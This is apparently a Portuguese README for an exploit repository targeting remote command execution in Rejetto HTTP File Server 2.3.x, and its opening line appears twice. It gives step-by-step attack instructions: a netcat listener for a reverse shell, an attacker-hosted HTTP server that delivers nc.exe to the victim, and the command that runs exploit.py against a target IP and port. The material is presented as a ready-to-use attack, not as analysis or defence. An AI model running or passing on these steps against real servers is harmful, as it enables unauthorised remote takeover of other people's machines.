
Este repositório contém explicação detalhada e poc funcional para Rejetto HTTP File Server (HFS) 2.3.x - Execução Remota de Comandos.
Este repositório contém explicação detalhada e PoC funcional para Rejetto HTTP File Server (HFS) 2.3.x - Execução Remota de Comandos.
Crie um listener netcat.
nc -lnvp 1234
Altere o IP do atacante para o seu IP e porta.

Crie também um servidor de arquivos HTTP no mesmo diretório onde o nc.exe está localizado.
python -m http.server 80
python exploit.py <target-ip> <target-port>

Nota: Talvez seja necessário executar o payload várias vezes para obter um reverse shell.